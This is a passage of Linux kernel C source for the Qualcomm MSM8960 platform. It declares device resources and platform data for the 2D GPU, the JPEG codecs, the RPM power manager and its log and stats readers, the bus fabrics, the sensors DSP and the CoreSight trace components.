static const struct kgsl_iommu_ctx kgsl_2d1_iommu_ctxs[] = {
{ "gfx2d1_2d1", 0 },
};
static struct kgsl_device_iommu_data kgsl_2d1_iommu_data[] = {
{
.iommu_ctxs = kgsl_2d1_iommu_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_2d1_iommu_ctxs),
.physstart = 0x07E00000,
.physend = 0x07E00000 + SZ_1M - 1,
},
};
static struct resource kgsl_2d1_resources[] = {
{
.name = KGSL_2D1_REG_MEMORY,
.start = 0x04200000, /* Z180 device 1 base address */
.end = 0x04200FFF,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_2D1_IRQ,
.start = GFX2D1_IRQ,
.end = GFX2D1_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct kgsl_device_platform_data kgsl_2d1_pdata = {
.pwrlevel = {
{
.gpu_freq = 200000000,
.bus_freq = 2,
},
{
.gpu_freq = 96000000,
.bus_freq = 1,
},
{
.gpu_freq = 27000000,
.bus_freq = 0,
},
},
.init_level = 0,
.num_levels = ARRAY_SIZE(grp2d_freq) + 1,
.set_grp_async = NULL,
.idle_timeout = HZ/5,
.clk_map = KGSL_CLK_CORE | KGSL_CLK_IFACE,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &grp2d1_bus_scale_pdata,
#endif
.iommu_data = kgsl_2d1_iommu_data,
.iommu_count = ARRAY_SIZE(kgsl_2d1_iommu_data),
.core_info = &grp2d_core_info,
};
struct platform_device msm_kgsl_2d1 = {
.name = "kgsl-2d1",
.id = 1,
.num_resources = ARRAY_SIZE(kgsl_2d1_resources),
.resource = kgsl_2d1_resources,
.dev = {
.platform_data = &kgsl_2d1_pdata,
},
};
#ifdef CONFIG_MSM_GEMINI
/* Gemini (JPEG encoder) bus-bandwidth vectors: idle and encode votes
 * toward EBI and multimedia IMEM. */
static struct msm_bus_vectors gemini_init_vector[] = {
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_MM_IMEM,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors gemini_encode_vector[] = {
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 540000000,
.ib = 1350000000,
},
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_MM_IMEM,
.ab = 43200000,
.ib = 69120000,
},
};
static struct msm_bus_paths gemini_bus_path[] = {
{
ARRAY_SIZE(gemini_init_vector),
gemini_init_vector,
},
{
ARRAY_SIZE(gemini_encode_vector),
gemini_encode_vector,
},
};
static struct msm_bus_scale_pdata gemini_bus_scale_pdata = {
gemini_bus_path,
ARRAY_SIZE(gemini_bus_path),
.name = "msm_gemini",
};
static struct resource msm_gemini_resources[] = {
{
.start = 0x04600000,
.end = 0x04600000 + SZ_1M - 1,
.flags = IORESOURCE_MEM,
},
{
.start = JPEG_IRQ,
.end = JPEG_IRQ,
.flags = IORESOURCE_IRQ,
},
};
/* Gemini device; the bus-scale table itself is passed as platform data. */
struct platform_device msm8960_gemini_device = {
.name = "msm_gemini",
.resource = msm_gemini_resources,
.num_resources = ARRAY_SIZE(msm_gemini_resources),
.dev = {
.platform_data = &gemini_bus_scale_pdata,
},
};
#endif
#ifdef CONFIG_MSM_MERCURY
/* Mercury (JPEG decoder) register window and IRQ. */
static struct resource msm_mercury_resources[] = {
{
.start = 0x05000000,
.end = 0x05000000 + SZ_1M - 1,
.name = "mercury_resource_base",
.flags = IORESOURCE_MEM,
},
{
.start = JPEGD_IRQ,
.end = JPEGD_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_mercury_device = {
.name = "msm_mercury",
.resource = msm_mercury_resources,
.num_resources = ARRAY_SIZE(msm_mercury_resources),
};
#endif
/*
 * Resource Power Manager (RPM) platform data for MSM8960.
 *
 * Describes the shared-memory message RAM layout (reg_base_addrs), the
 * interrupt lines used for the AP<->RPM handshake, the IPC trigger
 * register/value, and three ID translation tables:
 *  - target_id:      maps generic RPM resource IDs to 8960-specific
 *                    request-register IDs (last MSM_RPM_MAP arg = number
 *                    of 32-bit words the resource occupies);
 *  - target_status:  maps status-register IDs;
 *  - target_ctrl_id: maps control-register IDs.
 * Left byte-identical: the table is order/ID sensitive and generated to
 * match the RPM firmware interface.
 */
struct msm_rpm_platform_data msm8960_rpm_data __initdata = {
.reg_base_addrs = {
[MSM_RPM_PAGE_STATUS] = MSM_RPM_BASE,
[MSM_RPM_PAGE_CTRL] = MSM_RPM_BASE + 0x400,
[MSM_RPM_PAGE_REQ] = MSM_RPM_BASE + 0x600,
[MSM_RPM_PAGE_ACK] = MSM_RPM_BASE + 0xa00,
},
.irq_ack = RPM_APCC_CPU0_GP_HIGH_IRQ,
.irq_err = RPM_APCC_CPU0_GP_LOW_IRQ,
.irq_wakeup = RPM_APCC_CPU0_WAKE_UP_IRQ,
.ipc_rpm_reg = MSM_APCS_GCC_BASE + 0x008,
.ipc_rpm_val = 4,
.target_id = {
MSM_RPM_MAP(8960, NOTIFICATION_CONFIGURED_0, NOTIFICATION, 4),
MSM_RPM_MAP(8960, NOTIFICATION_REGISTERED_0, NOTIFICATION, 4),
MSM_RPM_MAP(8960, INVALIDATE_0, INVALIDATE, 8),
MSM_RPM_MAP(8960, TRIGGER_TIMED_TO, TRIGGER_TIMED, 1),
MSM_RPM_MAP(8960, TRIGGER_TIMED_SCLK_COUNT, TRIGGER_TIMED, 1),
MSM_RPM_MAP(8960, RPM_CTL, RPM_CTL, 1),
MSM_RPM_MAP(8960, CXO_CLK, CXO_CLK, 1),
MSM_RPM_MAP(8960, PXO_CLK, PXO_CLK, 1),
MSM_RPM_MAP(8960, APPS_FABRIC_CLK, APPS_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, SYSTEM_FABRIC_CLK, SYSTEM_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, MM_FABRIC_CLK, MM_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, DAYTONA_FABRIC_CLK, DAYTONA_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, SFPB_CLK, SFPB_CLK, 1),
MSM_RPM_MAP(8960, CFPB_CLK, CFPB_CLK, 1),
MSM_RPM_MAP(8960, MMFPB_CLK, MMFPB_CLK, 1),
MSM_RPM_MAP(8960, EBI1_CLK, EBI1_CLK, 1),
MSM_RPM_MAP(8960, APPS_FABRIC_CFG_HALT_0,
APPS_FABRIC_CFG_HALT, 2),
MSM_RPM_MAP(8960, APPS_FABRIC_CFG_CLKMOD_0,
APPS_FABRIC_CFG_CLKMOD, 3),
MSM_RPM_MAP(8960, APPS_FABRIC_CFG_IOCTL,
APPS_FABRIC_CFG_IOCTL, 1),
MSM_RPM_MAP(8960, APPS_FABRIC_ARB_0, APPS_FABRIC_ARB, 12),
MSM_RPM_MAP(8960, SYS_FABRIC_CFG_HALT_0,
SYS_FABRIC_CFG_HALT, 2),
MSM_RPM_MAP(8960, SYS_FABRIC_CFG_CLKMOD_0,
SYS_FABRIC_CFG_CLKMOD, 3),
MSM_RPM_MAP(8960, SYS_FABRIC_CFG_IOCTL,
SYS_FABRIC_CFG_IOCTL, 1),
MSM_RPM_MAP(8960, SYSTEM_FABRIC_ARB_0,
SYSTEM_FABRIC_ARB, 29),
MSM_RPM_MAP(8960, MMSS_FABRIC_CFG_HALT_0,
MMSS_FABRIC_CFG_HALT, 2),
MSM_RPM_MAP(8960, MMSS_FABRIC_CFG_CLKMOD_0,
MMSS_FABRIC_CFG_CLKMOD, 3),
MSM_RPM_MAP(8960, MMSS_FABRIC_CFG_IOCTL,
MMSS_FABRIC_CFG_IOCTL, 1),
MSM_RPM_MAP(8960, MM_FABRIC_ARB_0, MM_FABRIC_ARB, 23),
MSM_RPM_MAP(8960, PM8921_S1_0, PM8921_S1, 2),
MSM_RPM_MAP(8960, PM8921_S2_0, PM8921_S2, 2),
MSM_RPM_MAP(8960, PM8921_S3_0, PM8921_S3, 2),
MSM_RPM_MAP(8960, PM8921_S4_0, PM8921_S4, 2),
MSM_RPM_MAP(8960, PM8921_S5_0, PM8921_S5, 2),
MSM_RPM_MAP(8960, PM8921_S6_0, PM8921_S6, 2),
MSM_RPM_MAP(8960, PM8921_S7_0, PM8921_S7, 2),
MSM_RPM_MAP(8960, PM8921_S8_0, PM8921_S8, 2),
MSM_RPM_MAP(8960, PM8921_L1_0, PM8921_L1, 2),
MSM_RPM_MAP(8960, PM8921_L2_0, PM8921_L2, 2),
MSM_RPM_MAP(8960, PM8921_L3_0, PM8921_L3, 2),
MSM_RPM_MAP(8960, PM8921_L4_0, PM8921_L4, 2),
MSM_RPM_MAP(8960, PM8921_L5_0, PM8921_L5, 2),
MSM_RPM_MAP(8960, PM8921_L6_0, PM8921_L6, 2),
MSM_RPM_MAP(8960, PM8921_L7_0, PM8921_L7, 2),
MSM_RPM_MAP(8960, PM8921_L8_0, PM8921_L8, 2),
MSM_RPM_MAP(8960, PM8921_L9_0, PM8921_L9, 2),
MSM_RPM_MAP(8960, PM8921_L10_0, PM8921_L10, 2),
MSM_RPM_MAP(8960, PM8921_L11_0, PM8921_L11, 2),
MSM_RPM_MAP(8960, PM8921_L12_0, PM8921_L12, 2),
MSM_RPM_MAP(8960, PM8921_L13_0, PM8921_L13, 2),
MSM_RPM_MAP(8960, PM8921_L14_0, PM8921_L14, 2),
MSM_RPM_MAP(8960, PM8921_L15_0, PM8921_L15, 2),
MSM_RPM_MAP(8960, PM8921_L16_0, PM8921_L16, 2),
MSM_RPM_MAP(8960, PM8921_L17_0, PM8921_L17, 2),
MSM_RPM_MAP(8960, PM8921_L18_0, PM8921_L18, 2),
MSM_RPM_MAP(8960, PM8921_L19_0, PM8921_L19, 2),
MSM_RPM_MAP(8960, PM8921_L20_0, PM8921_L20, 2),
MSM_RPM_MAP(8960, PM8921_L21_0, PM8921_L21, 2),
MSM_RPM_MAP(8960, PM8921_L22_0, PM8921_L22, 2),
MSM_RPM_MAP(8960, PM8921_L23_0, PM8921_L23, 2),
MSM_RPM_MAP(8960, PM8921_L24_0, PM8921_L24, 2),
MSM_RPM_MAP(8960, PM8921_L25_0, PM8921_L25, 2),
MSM_RPM_MAP(8960, PM8921_L26_0, PM8921_L26, 2),
MSM_RPM_MAP(8960, PM8921_L27_0, PM8921_L27, 2),
MSM_RPM_MAP(8960, PM8921_L28_0, PM8921_L28, 2),
MSM_RPM_MAP(8960, PM8921_L29_0, PM8921_L29, 2),
MSM_RPM_MAP(8960, PM8921_CLK1_0, PM8921_CLK1, 2),
MSM_RPM_MAP(8960, PM8921_CLK2_0, PM8921_CLK2, 2),
MSM_RPM_MAP(8960, PM8921_LVS1, PM8921_LVS1, 1),
MSM_RPM_MAP(8960, PM8921_LVS2, PM8921_LVS2, 1),
MSM_RPM_MAP(8960, PM8921_LVS3, PM8921_LVS3, 1),
MSM_RPM_MAP(8960, PM8921_LVS4, PM8921_LVS4, 1),
MSM_RPM_MAP(8960, PM8921_LVS5, PM8921_LVS5, 1),
MSM_RPM_MAP(8960, PM8921_LVS6, PM8921_LVS6, 1),
MSM_RPM_MAP(8960, PM8921_LVS7, PM8921_LVS7, 1),
MSM_RPM_MAP(8960, NCP_0, NCP, 2),
MSM_RPM_MAP(8960, CXO_BUFFERS, CXO_BUFFERS, 1),
MSM_RPM_MAP(8960, USB_OTG_SWITCH, USB_OTG_SWITCH, 1),
MSM_RPM_MAP(8960, HDMI_SWITCH, HDMI_SWITCH, 1),
MSM_RPM_MAP(8960, DDR_DMM_0, DDR_DMM, 2),
MSM_RPM_MAP(8960, QDSS_CLK, QDSS_CLK, 1),
},
.target_status = {
MSM_RPM_STATUS_ID_MAP(8960, VERSION_MAJOR),
MSM_RPM_STATUS_ID_MAP(8960, VERSION_MINOR),
MSM_RPM_STATUS_ID_MAP(8960, VERSION_BUILD),
MSM_RPM_STATUS_ID_MAP(8960, SUPPORTED_RESOURCES_0),
MSM_RPM_STATUS_ID_MAP(8960, SUPPORTED_RESOURCES_1),
MSM_RPM_STATUS_ID_MAP(8960, SUPPORTED_RESOURCES_2),
MSM_RPM_STATUS_ID_MAP(8960, RESERVED_SUPPORTED_RESOURCES_0),
MSM_RPM_STATUS_ID_MAP(8960, SEQUENCE),
MSM_RPM_STATUS_ID_MAP(8960, RPM_CTL),
MSM_RPM_STATUS_ID_MAP(8960, CXO_CLK),
MSM_RPM_STATUS_ID_MAP(8960, PXO_CLK),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, SYSTEM_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, MM_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, DAYTONA_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, SFPB_CLK),
MSM_RPM_STATUS_ID_MAP(8960, CFPB_CLK),
MSM_RPM_STATUS_ID_MAP(8960, MMFPB_CLK),
MSM_RPM_STATUS_ID_MAP(8960, EBI1_CLK),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CFG_HALT),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CFG_CLKMOD),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CFG_IOCTL),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_ARB),
MSM_RPM_STATUS_ID_MAP(8960, SYS_FABRIC_CFG_HALT),
MSM_RPM_STATUS_ID_MAP(8960, SYS_FABRIC_CFG_CLKMOD),
MSM_RPM_STATUS_ID_MAP(8960, SYS_FABRIC_CFG_IOCTL),
MSM_RPM_STATUS_ID_MAP(8960, SYSTEM_FABRIC_ARB),
MSM_RPM_STATUS_ID_MAP(8960, MMSS_FABRIC_CFG_HALT),
MSM_RPM_STATUS_ID_MAP(8960, MMSS_FABRIC_CFG_CLKMOD),
MSM_RPM_STATUS_ID_MAP(8960, MMSS_FABRIC_CFG_IOCTL),
MSM_RPM_STATUS_ID_MAP(8960, MM_FABRIC_ARB),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S1_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S1_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S2_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S2_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S3_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S3_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S4_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S4_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S5_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S5_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S6_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S6_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S7_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S7_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S8_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S8_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L1_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L1_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L2_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L2_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L3_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L3_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L4_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L4_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L5_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L5_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L6_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L6_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L7_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L7_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L8_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L8_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L9_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L9_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L10_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L10_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L11_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L11_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L12_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L12_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L13_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L13_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L14_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L14_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L15_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L15_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L16_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L16_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L17_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L17_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L18_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L18_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L19_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L19_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L20_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L20_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L21_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L21_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L22_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L22_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L23_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L23_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L24_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L24_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L25_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L25_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L26_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L26_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L27_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L27_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L28_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L28_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L29_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L29_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK1_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK1_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK2_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK2_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS2),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS3),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS4),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS5),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS6),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS7),
MSM_RPM_STATUS_ID_MAP(8960, NCP_0),
MSM_RPM_STATUS_ID_MAP(8960, NCP_1),
MSM_RPM_STATUS_ID_MAP(8960, CXO_BUFFERS),
MSM_RPM_STATUS_ID_MAP(8960, USB_OTG_SWITCH),
MSM_RPM_STATUS_ID_MAP(8960, HDMI_SWITCH),
MSM_RPM_STATUS_ID_MAP(8960, DDR_DMM_0),
MSM_RPM_STATUS_ID_MAP(8960, DDR_DMM_1),
MSM_RPM_STATUS_ID_MAP(8960, EBI1_CH0_RANGE),
MSM_RPM_STATUS_ID_MAP(8960, EBI1_CH1_RANGE),
},
.target_ctrl_id = {
MSM_RPM_CTRL_MAP(8960, VERSION_MAJOR),
MSM_RPM_CTRL_MAP(8960, VERSION_MINOR),
MSM_RPM_CTRL_MAP(8960, VERSION_BUILD),
MSM_RPM_CTRL_MAP(8960, REQ_CTX_0),
MSM_RPM_CTRL_MAP(8960, REQ_SEL_0),
MSM_RPM_CTRL_MAP(8960, ACK_CTX_0),
MSM_RPM_CTRL_MAP(8960, ACK_SEL_0),
},
.sel_invalidate = MSM_RPM_8960_SEL_INVALIDATE,
.sel_notification = MSM_RPM_8960_SEL_NOTIFICATION,
.sel_last = MSM_RPM_8960_SEL_LAST,
.ver = {3, 0, 0},
};
/* RPM platform device; its pdata (msm8960_rpm_data) is handed to the
 * driver at board-init time rather than via .dev.platform_data here. */
struct platform_device msm8960_rpm_device = {
.name = "msm_rpm",
.id = -1,
};
/* RPM firmware log reader: physical location and layout of the RPM's
 * circular log buffer in message RAM, plus the exporting device. */
static struct msm_rpm_log_platform_data msm_rpm_log_pdata = {
.phys_addr_base = 0x0010C000,
.reg_offsets = {
[MSM_RPM_LOG_PAGE_INDICES] = 0x00000080,
[MSM_RPM_LOG_PAGE_BUFFER] = 0x000000A0,
},
.phys_size = SZ_8K,
.log_len = 4096, /* log's buffer length in bytes */
.log_len_mask = (4096 >> 2) - 1, /* length mask in units of u32 */
};
struct platform_device msm8960_rpm_log_device = {
.name = "msm_rpm_log",
.id = -1,
.dev = {
.platform_data = &msm_rpm_log_pdata,
},
};
/* RPM sleep-statistics reader: 256-byte stats region in message RAM and
 * the device that exposes it. */
static struct msm_rpmstats_platform_data msm_rpm_stat_pdata = {
.phys_addr_base = 0x0010DD04,
.phys_size = SZ_256,
};
struct platform_device msm8960_rpm_stat_device = {
.name = "msm_rpm_stat",
.id = -1,
.dev = {
.platform_data = &msm_rpm_stat_pdata,
},
};
/*
 * RPM per-master statistics region (256 bytes).
 * struct resource .end is inclusive; every other MEM resource in this file
 * uses "base + size - 1".  The original ".end = BASE + SZ_256" covered 257
 * bytes — fix the off-by-one.
 */
static struct resource resources_rpm_master_stats[] = {
	{
		.start = MSM8960_RPM_MASTER_STATS_BASE,
		.end = MSM8960_RPM_MASTER_STATS_BASE + SZ_256 - 1,
		.flags = IORESOURCE_MEM,
	},
};
/* Names of the bus/power masters whose RPM statistics are reported, the
 * pdata tying names to the stats region, and the exporting device. */
static char *master_names[] = {
"KPSS",
"GPSS",
"LPASS",
"RIVA",
"DSPS",
};
static struct msm_rpm_master_stats_platform_data msm_rpm_master_stat_pdata = {
.masters = master_names,
.nomasters = ARRAY_SIZE(master_names),
};
struct platform_device msm8960_rpm_master_stat_device = {
.name = "msm_rpm_master_stat",
.id = -1,
.num_resources = ARRAY_SIZE(resources_rpm_master_stats),
.resource = resources_rpm_master_stats,
.dev = {
.platform_data = &msm_rpm_master_stat_pdata,
},
};
/* One "msm_bus_fabric" device per bus fabric; the .id selects which
 * fabric the shared driver instance manages. */
struct platform_device msm_bus_sys_fabric = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_SYSTEM,
};
struct platform_device msm_bus_apps_fabric = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_APPSS,
};
struct platform_device msm_bus_mm_fabric = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_MMSS,
};
struct platform_device msm_bus_sys_fpb = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_SYSTEM_FPB,
};
struct platform_device msm_bus_cpss_fpb = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_CPSS_FPB,
};
/* Sensors DSPS platform data */
#ifdef CONFIG_MSM_DSPS
/* Physical layout of the sensors DSPS (dedicated sensors processor)
 * memory regions: TCM code/buffer, pipe memory, DDR region, shared
 * memory, and its register block. */
#define PPSS_DSPS_TCM_CODE_BASE 0x12000000
#define PPSS_DSPS_TCM_CODE_SIZE 0x28000
#define PPSS_DSPS_TCM_BUF_BASE 0x12040000
#define PPSS_DSPS_TCM_BUF_SIZE 0x4000
#define PPSS_DSPS_PIPE_BASE 0x12800000
#define PPSS_DSPS_PIPE_SIZE 0x4000
#define PPSS_DSPS_DDR_BASE 0x8fe00000
#define PPSS_DSPS_DDR_SIZE 0x100000
#define PPSS_SMEM_BASE 0x80000000
#define PPSS_SMEM_SIZE 0x200000
#define PPSS_REG_PHYS_BASE 0x12080000
#define PPSS_WDOG_UNMASKED_INT_EN 0x1808
/* No extra clocks/regulators are managed from here on 8960. */
static struct dsps_clk_info dsps_clks[] = {};
static struct dsps_regulator_info dsps_regs[] = {};
/*
 * Note: GPIOs field is intialized in run-time at the function
 * msm8960_init_dsps().
 */
struct msm_dsps_platform_data msm_dsps_pdata = {
.clks = dsps_clks,
.clks_num = ARRAY_SIZE(dsps_clks),
.gpios = NULL,
.gpios_num = 0,
.regs = dsps_regs,
.regs_num = ARRAY_SIZE(dsps_regs),
.dsps_pwr_ctl_en = 1,
.tcm_code_start = PPSS_DSPS_TCM_CODE_BASE,
.tcm_code_size = PPSS_DSPS_TCM_CODE_SIZE,
.tcm_buf_start = PPSS_DSPS_TCM_BUF_BASE,
.tcm_buf_size = PPSS_DSPS_TCM_BUF_SIZE,
.pipe_start = PPSS_DSPS_PIPE_BASE,
.pipe_size = PPSS_DSPS_PIPE_SIZE,
.ddr_start = PPSS_DSPS_DDR_BASE,
.ddr_size = PPSS_DSPS_DDR_SIZE,
.smem_start = PPSS_SMEM_BASE,
.smem_size = PPSS_SMEM_SIZE,
.ppss_wdog_unmasked_int_en_reg = PPSS_WDOG_UNMASKED_INT_EN,
.signature = DSPS_SIGNATURE,
};
static struct resource msm_dsps_resources[] = {
{
.start = PPSS_REG_PHYS_BASE,
.end = PPSS_REG_PHYS_BASE + SZ_8K - 1,
.name = "ppss_reg",
.flags = IORESOURCE_MEM,
},
{
.start = PPSS_WDOG_TIMER_IRQ,
.end = PPSS_WDOG_TIMER_IRQ,
.name = "ppss_wdog",
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm_dsps_device = {
.name = "msm_dsps",
.id = 0,
.num_resources = ARRAY_SIZE(msm_dsps_resources),
.resource = msm_dsps_resources,
.dev.platform_data = &msm_dsps_pdata,
};
#endif /* CONFIG_MSM_DSPS */
#define CORESIGHT_PHYS_BASE 0x01A00000
#define CORESIGHT_TPIU_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x3000)
#define CORESIGHT_ETB_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x1000)
#define CORESIGHT_FUNNEL_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x4000)
#define CORESIGHT_STM_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x6000)
#define CORESIGHT_ETM0_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x1C000)
#define CORESIGHT_ETM1_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x1D000)
#define CORESIGHT_STM_CHANNEL_PHYS_BASE (0x14000000 + 0x280000)
/* CoreSight TPIU (trace port sink): one 4K register page, one inport,
 * no downstream ports. */
static struct resource coresight_tpiu_resources[] = {
{
.start = CORESIGHT_TPIU_PHYS_BASE,
.end = CORESIGHT_TPIU_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static struct coresight_platform_data coresight_tpiu_pdata = {
.id = 0,
.name = "coresight-tpiu",
.nr_inports = 1,
.nr_outports = 0,
};
struct platform_device coresight_tpiu_device = {
.name = "coresight-tpiu",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_tpiu_resources),
.resource = coresight_tpiu_resources,
.dev = {
.platform_data = &coresight_tpiu_pdata,
},
};
/* CoreSight ETB (embedded trace buffer): 4K register page; marked as the
 * default trace sink for the topology. */
static struct resource coresight_etb_resources[] = {
{
.start = CORESIGHT_ETB_PHYS_BASE,
.end = CORESIGHT_ETB_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static struct coresight_platform_data coresight_etb_pdata = {
.id = 1,
.name = "coresight-etb",
.nr_inports = 1,
.nr_outports = 0,
.default_sink = true,
};
struct platform_device coresight_etb_device = {
.name = "coresight-etb",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_etb_resources),
.resource = coresight_etb_resources,
.dev = {
.platform_data = &coresight_etb_pdata,
},
};
/* CoreSight funnel: merges up to 4 trace inputs; its two outports feed
 * the components with CoreSight ids 0 (TPIU) and 1 (ETB), each on that
 * child's port 0. */
static struct resource coresight_funnel_resources[] = {
{
.start = CORESIGHT_FUNNEL_PHYS_BASE,
.end = CORESIGHT_FUNNEL_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_funnel_outports[] = { 0, 1 };
static const int coresight_funnel_child_ids[] = { 0, 1 };
static const int coresight_funnel_child_ports[] = { 0, 0 };
static struct coresight_platform_data coresight_funnel_pdata = {
.id = 2,
.name = "coresight-funnel",
.nr_inports = 4,
.outports = coresight_funnel_outports,
.child_ids = coresight_funnel_child_ids,
.child_ports = coresight_funnel_child_ports,
.nr_outports = ARRAY_SIZE(coresight_funnel_outports),
};
struct platform_device coresight_funnel_device = {
.name = "coresight-funnel",
.id = 0,
